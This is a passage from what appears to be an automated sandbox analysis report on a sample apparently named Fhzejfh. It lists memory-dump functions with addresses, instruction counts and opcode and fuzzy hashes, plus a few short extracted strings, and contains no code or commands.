                                                                            • Opcode Fuzzy Hash: abf280674ddb0be1454e7472dd85e1d77055bd875b0d33ca8767bb88e1815191
                                                                            • Instruction Fuzzy Hash: 52015E70A543559FEB14DFA4E954BEE7BB2BF48700F54C429D805E7299EB349804CB60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D7D8B0 Relevance: .0, Instructions: 38COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c79d18a21fb2833a1e76c7fe2e56c30b62a953c3aa5f390cab53b93f1aedce59
                                                                            • Instruction ID: 049572d9c1370f6fa821731e6478322c77f4ba75fb103b7f2c0adfb5e84206e6
                                                                            • Opcode Fuzzy Hash: c79d18a21fb2833a1e76c7fe2e56c30b62a953c3aa5f390cab53b93f1aedce59
                                                                            • Instruction Fuzzy Hash: B5F02462B4D2915FE32207781C10325BFB29FC6321F1880ABC489CF3A2EA56D802C362
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D71D78 Relevance: .0, Instructions: 37COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 35a9db5dbbb2b7323d4ff269f568c27b70dca3d16c809367e1a0bbf1377898ea
                                                                            • Instruction ID: 05a1901e2c660132a209fac3af140ee144781fbe55cea2c5612f91a244d75468
                                                                            • Opcode Fuzzy Hash: 35a9db5dbbb2b7323d4ff269f568c27b70dca3d16c809367e1a0bbf1377898ea
                                                                            • Instruction Fuzzy Hash: 8FF03A757045145FD3149A5ED885F57B7EAEFC8B61B248069F109CB365EAB0EC018AA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D77F48 Relevance: .0, Instructions: 37COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 35a9db5dbbb2b7323d4ff269f568c27b70dca3d16c809367e1a0bbf1377898ea
                                                                            • Instruction ID: e773c11b826a33f827058486cfeee7f1463635ebe4551ae98c2975822dea6a70
                                                                            • Opcode Fuzzy Hash: 35a9db5dbbb2b7323d4ff269f568c27b70dca3d16c809367e1a0bbf1377898ea
                                                                            • Instruction Fuzzy Hash: B0F03A357045149FD3149A5ED984F57B7EAFFC8B61B248469F109CB365EA70EC0186A0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D78040 Relevance: .0, Instructions: 35COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0fe1d6ef7919103dcae06a84277045412a9659e82340af6c2836671069b038b4
                                                                            • Instruction ID: 1e2eb0c7752c253657ad1952675a189c9b1d9b82cefe3931bb7105cef0eee1ec
                                                                            • Opcode Fuzzy Hash: 0fe1d6ef7919103dcae06a84277045412a9659e82340af6c2836671069b038b4
                                                                            • Instruction Fuzzy Hash: 52F0F6321147455FD321EF38F7C10C4BBA2FB983303408B65D0944B6E5EB716A4A87E1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D7CA00 Relevance: .0, Instructions: 34COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2a4fc06badefc8734c2317b6d5e96392f36f9428ff05ed76248d9b3cf7bc15c6
                                                                            • Instruction ID: d27e4815f76fc0c791d28a979b4bf1fb3d27c7037ae77c8f9b07bb27d20e5043
                                                                            • Opcode Fuzzy Hash: 2a4fc06badefc8734c2317b6d5e96392f36f9428ff05ed76248d9b3cf7bc15c6
                                                                            • Instruction Fuzzy Hash: DBF082357241155FC7049B2ED858E117BEAEFC9711719C0FAF909CB371EA60DC0587A0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D7FB11 Relevance: .0, Instructions: 34COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e57920ecb41b13f310920990f0fd97e597565251bed6d16e6505f4b71c74d953
                                                                            • Instruction ID: 084df666594a4f7d06ac738e64d295aace0145a48b95245693803f20240ac369
                                                                            • Opcode Fuzzy Hash: e57920ecb41b13f310920990f0fd97e597565251bed6d16e6505f4b71c74d953
                                                                            • Instruction Fuzzy Hash: BBF0B471904648AFEB15CFA4D48D2DCBFB2DF50310F09C1A6D00997252EB340A82C780
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D71D6B Relevance: .0, Instructions: 33COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: faf46d78cf1ac04e19c8c3a997758bd0ac53bbe432f3837fe504cb9656481975
                                                                            • Instruction ID: 208500e427afc1b5aa6a0b3e94b7b550e53ad27de4c520880d593916062f27fc
                                                                            • Opcode Fuzzy Hash: faf46d78cf1ac04e19c8c3a997758bd0ac53bbe432f3837fe504cb9656481975
                                                                            • Instruction Fuzzy Hash: 64F02E353086801FD315876D5850EA7BFF9EFC9310718459AF089C7366D960DC028760
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D77F3B Relevance: .0, Instructions: 33COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ff0f0068e9f1b269ea67ef7dd6b0ae4bd2d044e3ac19d32b41231e6344db45b0
                                                                            • Instruction ID: aa83139e4a7b33cd381c2fc6e03adf2a35231aadf4908ef2a79c5c115df5331a
                                                                            • Opcode Fuzzy Hash: ff0f0068e9f1b269ea67ef7dd6b0ae4bd2d044e3ac19d32b41231e6344db45b0
                                                                            • Instruction Fuzzy Hash: FFF020363086411FE305864E9840A43BBEEFFC9310B2480AAF108C7366EA609C0183A0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D74D30 Relevance: .0, Instructions: 31COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d7aada030622e224854cc5513544fbfe0c6338964cb9c4d27c9d29ec54b2e790
                                                                            • Instruction ID: 3b063cc65c7f17bf7f9fffee3f5ac3ee0e3a5a204352d06d902eb10c652f6333
                                                                            • Opcode Fuzzy Hash: d7aada030622e224854cc5513544fbfe0c6338964cb9c4d27c9d29ec54b2e790
                                                                            • Instruction Fuzzy Hash: 72E09B717043114BC77E1BF858241B97BA9DBD779475984AFD08DCB3AAEE219C0243B1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D7C440 Relevance: .0, Instructions: 29COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 339c080f6a311d4df0bea7c135b93e9f32aae60d87a03a525d21118de9eb5350
                                                                            • Instruction ID: 92a594106dda1abbfbd3d4dac841809beb250f3464d5c481b79898567b76ef7f
                                                                            • Opcode Fuzzy Hash: 339c080f6a311d4df0bea7c135b93e9f32aae60d87a03a525d21118de9eb5350
                                                                            • Instruction Fuzzy Hash: BDE0D872515208EFC711CF74DC56599BBBCEF0720470446FAD84DC7211FA319A01C7A2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D74E48 Relevance: .0, Instructions: 27COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3ea317c94a36eefe30f73ee2dec39a27a07dad40102172b1a1e20de9dcd367d0
                                                                            • Instruction ID: 988f6c16799f531d4dd0e44fa96a19abd624b8cae5d0aa20c4accbff6722dd97
                                                                            • Opcode Fuzzy Hash: 3ea317c94a36eefe30f73ee2dec39a27a07dad40102172b1a1e20de9dcd367d0
                                                                            • Instruction Fuzzy Hash: 62E04F327042189FCB15DAE8A8006DA7BEDEB49671F1040BBE50CC3654EA32994087A0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D7D331 Relevance: .0, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a4504dc2261e7bd0ce836b9b54be54e2f5a3dfe8eb05668e9d996b77a56836f4
                                                                            • Instruction ID: b374b2b3a0d1058c204e5bde1c311c5849c28cb1733f0d98ccdd2131d1a6523a
                                                                            • Opcode Fuzzy Hash: a4504dc2261e7bd0ce836b9b54be54e2f5a3dfe8eb05668e9d996b77a56836f4
                                                                            • Instruction Fuzzy Hash: 78E092B1A4434CAFCB01DBB0EA117AE7FB6DB45710F0184EAEA04CB295E5351E0497A0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D7CEE0 Relevance: .0, Instructions: 21COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b56910701bbfa1d7cfc58febb7a88dd274f309df72c1bb708cf754a17310eee3
                                                                            • Instruction ID: c446dbe69af4ba842baa1bbc3ab3a9b66fa0a4be61e100df523a1c179fc835a4
                                                                            • Opcode Fuzzy Hash: b56910701bbfa1d7cfc58febb7a88dd274f309df72c1bb708cf754a17310eee3
                                                                            • Instruction Fuzzy Hash: C7E0D834508288EFC701DFB4D91019D7FB4EF4A300B0440DAD448C3356E6316F14D795
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D76382 Relevance: .0, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 689a6ff7342b09f131a05e2b5baaa6328c47c2634c18dc42cf1c5c55214ca2e7
                                                                            • Instruction ID: 6c9e67151061d676ad246dbad60d3887416edd5f3e5f8de445cdcd6435ae5d02
                                                                            • Opcode Fuzzy Hash: 689a6ff7342b09f131a05e2b5baaa6328c47c2634c18dc42cf1c5c55214ca2e7
                                                                            • Instruction Fuzzy Hash: 11D0A97600EB510FD70197A028001A23F288E4324A30D80E2A08CDA012F504EC18C231
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D7D340 Relevance: .0, Instructions: 18COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: daae9f62ef7a60b0f5a736387db18a335a3c989b8227ae80b738828041969fb6
                                                                            • Instruction ID: eaed4551b91065e9180a946bf4f219dddc54da557e4ebd2a68716491ab5f644e
                                                                            • Opcode Fuzzy Hash: daae9f62ef7a60b0f5a736387db18a335a3c989b8227ae80b738828041969fb6
                                                                            • Instruction Fuzzy Hash: 72E01271A4030CEBCB00DFB4EA426AEB7BADB48310F5084B9E904D7344E9315F059BA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D7CEF0 Relevance: .0, Instructions: 17COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 52b47db5dfb2cef744b65874c29e560200165c2bddd5167e726396d21f2205de
                                                                            • Instruction ID: e4669f52135ccbc41e308f2ac7fb06786ba2cd38aacc3484640cf32421191625
                                                                            • Opcode Fuzzy Hash: 52b47db5dfb2cef744b65874c29e560200165c2bddd5167e726396d21f2205de
                                                                            • Instruction Fuzzy Hash: 84E01231A0020CEFCB00DFA4D60159D77F5EB44340F1045A9D409D3344E9315F109791
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D709AB Relevance: .0, Instructions: 11COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fc6ea8c5b8792f84174eea525f47fd8a4dea49a7473a5ea8370d0eb2fbf204ac
                                                                            • Instruction ID: 3606e2201f035eac7b6e0c98f7a4ae4af123104011fa759d76b253265209fb89
                                                                            • Opcode Fuzzy Hash: fc6ea8c5b8792f84174eea525f47fd8a4dea49a7473a5ea8370d0eb2fbf204ac
                                                                            • Instruction Fuzzy Hash: 49D0C92254D7C08FCB0367F469291A83FA1AD6661534809EBD085CB563DBA04556C726
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D76398 Relevance: .0, Instructions: 11COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9141ce950fc38ee7c01e810a061e9688edb58d829f9eedb1b68ef1e393b331d8
                                                                            • Instruction ID: c4ed311bfe9d4e073567d41529a0110c68854ae2b0e4884c826d5b8b2d2698e4
                                                                            • Opcode Fuzzy Hash: 9141ce950fc38ee7c01e810a061e9688edb58d829f9eedb1b68ef1e393b331d8
                                                                            • Instruction Fuzzy Hash: 63B09232265A180BEA50A7BA7C44726338C8780618F4C4066B40CC1A40F546E8A060A1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D71B78 Relevance: .0, Instructions: 11COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f307d5c4500ca1d82744fe44ce230d6adbec24ed98c0ef8a08da7c55c9fdd064
                                                                            • Instruction ID: f1f2e2850f59b2dee086b01f3dc0a5dc19b3d7e58296dd23073720b3f8977248
                                                                            • Opcode Fuzzy Hash: f307d5c4500ca1d82744fe44ce230d6adbec24ed98c0ef8a08da7c55c9fdd064
                                                                            • Instruction Fuzzy Hash: 87C0126000E3829FCF028BA99A64092BF306F4B30030B48C3E085CF0B3EA246C08E762
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D7E7B0 Relevance: .0, Instructions: 11COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 213b4ff7fd675e5d66728abe627d7e34d9efe651521eb006905c724bb2952779
                                                                            • Instruction ID: ee6d6d64f1c7514ef30a6095caad08c5d8d54692930182a57a50f8dfc52ffda8
                                                                            • Opcode Fuzzy Hash: 213b4ff7fd675e5d66728abe627d7e34d9efe651521eb006905c724bb2952779
                                                                            • Instruction Fuzzy Hash: BCC04CB05CA3849FEF1197A05D5F7543F209B56700F2601E7E28DCE0E2C1944445C796
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D70841 Relevance: .0, Instructions: 9COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2131e602382e51f88d93f8670b4115f681f0f8e62cd097dfa9fca2c46e474aaa
                                                                            • Instruction ID: dd3f8f7429edb3414eeea673e181a87aeb04e622a97fddfe83db3ee5b1359b98
                                                                            • Opcode Fuzzy Hash: 2131e602382e51f88d93f8670b4115f681f0f8e62cd097dfa9fca2c46e474aaa
                                                                            • Instruction Fuzzy Hash: A6C04C5540F3C49FD71387A55A280547F70992751538905E7D1A5CB873D618440A8326
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D709B8 Relevance: .0, Instructions: 9COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 35a40ad789b6a3431ed28ed17112e9099a7f3e27fe871bfc82572bc1a4a167ec
                                                                            • Instruction ID: c1eb2021cd27156b3b0aacfbb34173b29d656fca9febf46b9e50f997cf1b0ef4
                                                                            • Opcode Fuzzy Hash: 35a40ad789b6a3431ed28ed17112e9099a7f3e27fe871bfc82572bc1a4a167ec
                                                                            • Instruction Fuzzy Hash: B8B09B31954704578E0437F8781E16C37D9E64472534005B5E506C7651DE71A9514765
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D74960 Relevance: .0, Instructions: 7COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f5851f18d93c048d7432355c3c3198d906b72e221f854dffb69ffb49acb67b6e
                                                                            • Instruction ID: 6996434e96653e22ca85efc1c99b2242c3e1e9b98452f61486cf8801e7868f68
                                                                            • Opcode Fuzzy Hash: f5851f18d93c048d7432355c3c3198d906b72e221f854dffb69ffb49acb67b6e
                                                                            • Instruction Fuzzy Hash: C3B092300113088BC6003B68FC2D148FB2DAE40B02740002AB10EC06318B621C008A60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D7C3FB Relevance: .0, Instructions: 7COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7cdf58325ba739c580e5f39423665136d1bc6f7372c047d0603fb76a007ec89f
                                                                            • Instruction ID: 55ce3ac5a36c32e4f8f30a123197313e210956623762510b74f53fb3ac07d9b5
                                                                            • Opcode Fuzzy Hash: 7cdf58325ba739c580e5f39423665136d1bc6f7372c047d0603fb76a007ec89f
                                                                            • Instruction Fuzzy Hash: 43B09236A60028AA8A00D698F8A18DCBB20EE90272B000032D20052000467015288A90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D70850 Relevance: .0, Instructions: 5COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 253230d2b502c21617cac0d09fd99252d1329199b0694c00f07366125d5b5393
                                                                            • Instruction ID: 8d7b10699e05652fc55d53e3f33a93506d25133e6f7beddefa3a6e59f1b30e72
                                                                            • Opcode Fuzzy Hash: 253230d2b502c21617cac0d09fd99252d1329199b0694c00f07366125d5b5393
                                                                            • Instruction Fuzzy Hash: 8390023504560C8B455067D979095657B5CD5495157801071E61D419115B5564124595
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            Function 00D7A826 Relevance: 6.3, Strings: 5, Instructions: 5COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: TJeq$\$jjjjjj$$`q$$`q
                                                                            • API String ID: 0-713343189
                                                                            • Opcode ID: b390f0b808d56fbab78e8c4bade50f9253c2a82acf75fe0b0e2461a62fd9da79
                                                                            • Instruction ID: f282b21547740331e786075bc9d1d5ddf533293197ba5ba35531edfee37beab4
                                                                            • Opcode Fuzzy Hash: b390f0b808d56fbab78e8c4bade50f9253c2a82acf75fe0b0e2461a62fd9da79
                                                                            • Instruction Fuzzy Hash: 09B0125240D3C54EC3430E5554C00407F30AA3300030E41C6C4800F443D0004A86C721
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Executed Functions

                                                                            Function 008A5298 Relevance: 1.7, Strings: 1, Instructions: 443COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000026.00000002.472222191.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_38_2_8a0000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LR`q
                                                                            • API String ID: 0-3712084042
                                                                            • Opcode ID: 8fb1758406f08f97bd47c1d62b9158098c9907186af81e5fa044b30655ca283f
                                                                            • Instruction ID: 4e12125b4beb6a56f78ba6857b5377e6b97cd8f79b9b0bc6591faa43cc2be89e
                                                                            • Opcode Fuzzy Hash: 8fb1758406f08f97bd47c1d62b9158098c9907186af81e5fa044b30655ca283f
                                                                            • Instruction Fuzzy Hash: 6F126B34E10619CFDB14DF69D884AAEBBF2FF89305F158669D005EB258DB34A981CF81
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 008A59F4 Relevance: 1.6, Strings: 1, Instructions: 380COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000026.00000002.472222191.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_38_2_8a0000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LR`q
                                                                            • API String ID: 0-3712084042
                                                                            • Opcode ID: 822e6da0d2e475df03c7fa3302fb15503b9baa54c7f7f0ccee9b83d98e5f07de
                                                                            • Instruction ID: 8cb14fbce555f0b0dd51360ccaefed795443b302adf7eaf9ef6407e748965ab7
                                                                            • Opcode Fuzzy Hash: 822e6da0d2e475df03c7fa3302fb15503b9baa54c7f7f0ccee9b83d98e5f07de
                                                                            • Instruction Fuzzy Hash: E4F1AF30A00A69CFDB14DB69C880AADFBF2FF89304F19C5A9D059DB655D734AD81CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 008A5289 Relevance: 1.5, Strings: 1, Instructions: 240COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000026.00000002.472222191.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_38_2_8a0000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LR`q
                                                                            • API String ID: 0-3712084042
                                                                            • Opcode ID: 345f743c7fcb8106e233232fce65974d93e378f711cdfb1fa75b0aeb77b6bca5
                                                                            • Instruction ID: 992e0d6e3eae30023550d1928d7bddd5e3d484cec941b9d3bf0bcd4e2db2ffeb
